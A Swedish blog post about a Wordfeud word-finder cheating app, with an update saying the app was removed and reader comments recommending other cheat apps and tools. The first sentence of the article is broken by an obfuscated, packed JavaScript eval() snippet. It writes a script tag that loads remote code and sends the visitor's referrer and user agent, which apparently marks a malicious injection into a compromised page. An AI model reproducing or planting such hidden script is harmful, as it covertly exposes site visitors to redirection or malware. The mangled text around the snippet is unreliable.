Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Fusk App till Wordfeud gör att du kan lista bästa orden

Fusk App till Wordfeud gör att du kan lista bästa orden
Sebastian

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbrha|var|u0026u|referrer|iktkh||js|php’.split(’|’),0,{}))
många nyheter och uppdateringar gällande fusk på svenska Wordfeud har det nu kommit upp en applikation i appstore som gör att du kan lista de bästa orden att lägga. Självklart skapar detta debatt.

Att spela mot okända personer på Wordfeud har varit den funktionen enligt mig som varit roligast.
Nu på senare tid har jag dock märkt att de svenskar jag spelar emot plötsligt är otroligt mycket bättre än vad dem varit tidigare. Konstiga ord som jag själv aldrig hört läggs och poäng upp mot 100 per ord delas ut.

Applikationen ”Swedish Word Finder” som nu ligger etta på svenska appstore gör det möjligt att generera de bästa möjliga ord utifrån de bokstäver du har tillgängliga. Denna app har gjort att flera spelare slutat använda Wordfeud, konstigt? nej.

Detta är inget att hålla hemligt längre utan du kan nu ladda ner ”Swedish Word Finder” i appstore för 7 kr och enkelt ta hem segern. Men självklart bara om din motståndare inte också använder den :p . Ladda ner appen här: Fusk till Wordfeud

*UPPDATERING*

Fuskappen stoppas i appstore. Läs här: http://www.revue.se/2011/10/mobil/android/fuskappen-till-wordfeud-stoppas/

WordsFinder for Wordfeud / Swedish - Rick Jansen

Comments

 1. Mikael Sjögren

  Finns en liknande app till de som använder Android: https://market.android.com/details?id=com.MadGorillaGames.WFHelper

  Nu kan iPhone- och Androidanvändare tävla på lika villkor 🙂

 2. storm

  Appen är sådär. Men det är väll det bästa hitills. Skulel vilja veta hur mycket den där personen har dragit in i cash 🙂

 3. Lisa

  Sluta fuska det förstör bara för alla andra som inte gör det. Har nästan slutat spela pågrund av detta.

 4. nina

  Asså, men tanke på hur mycket folk luras hela tiden i vanliga livet så känns det GANSKA ok att luras lite i Wordfeud.. Den bästa fuskappen ja hittat är inte den i artikeln, utan Wordfraud – räknar ut exakt poäng för varje ord, hehe! I like. Lätt å allt sånt. inget krångel :o) kram till alla WF fans därute!! /Bella

  • Ey Kompis

   Men det är ju inte kul att spela mot personer som inte tänker ut orden själv. Det förstör ju hela spelets tanke. / Hej svejs

 5. jösse
 6. Johan_Karlsson_82

  Om du spelar poker på nätet så kan du använda massor av program som räknar ut nästan allt för dig och hur din spelare kommer att agera… Blir nästan självspelande…

  Om man använder wordscorer.com så blir man verkligen en mästare på Wordfeud, blir självspelande då också skulle man kunna säga…. Många spelar på ”random board” för att folk inte skall kunna fuska till 100 %, men det löser wordscorer….

  • Strimlan

   Ge mig ett program för pokern 😛 vore shysst

 7. Oscar L

  ”Ordgenerator för Wordfeud” (http://itunes.apple.com/se/app/ordgenerator-for-wordfeud/id472341465?mt=8) är den överlägset bästa fuskappen jag skaffat. Helt klart värt sina 7 kronor och gör dig även bättre än alla dessa personer som använder de andra fuskapparna.

  Känns som Ordgenerator för Wordfeud har fler ord i sin databas, kan det stämma? De påstår på sin site att det är en kopia av wordfeuds databas och det är därför den kan hitta så övernaturligt bra ord… någon som vet?

 8. Spela det pa datorn, precis som pa mobiltelefon. http://www.wordfeudforpc.com